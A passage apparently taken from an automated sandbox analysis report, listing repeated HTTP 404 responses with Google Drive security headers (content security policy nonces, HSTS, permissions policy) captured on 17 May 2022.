ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-BeUbZL+oiNE39U/mdT+l5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-7ZL3t1yYfGgznLfwaAeBMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-Q3GxPPmT21U+gpPVrRrjwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MdE4TVOl/zh2f+lGiYzBbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-iw3A8xcWghxVSYRjb80Mgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-mfEtUS9qtgOg8tirHW+nlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8T0eton7u+7/AIsHLLy14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-HGNHVVRPfe3A+RDrGdJ7Aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JciMFMDUWc1acnLUQuoRiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ywASHw+D8BbFYVjFS+EpJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BIOS7414HiQRnRrzB5tFhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hJn5AOJ7TgyNA7gEfDg1NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:57 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-XVZOlPjVvoI4jsFUipi6Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-idteusqGZ8DN7qyfSd/XrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZleZ6WbxflVe+6JU1IFmCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tMmUfs9Ph7/bNMjKASvvTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-lAPHai5gEYPW8nQtv6/Rbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Dt8t1g08Fdh8VJIfLtGr5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Sw2giUHQ8EZfUFwIV64LMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:58 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-p4/gYSyZZFB6V0oqeqAAkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, 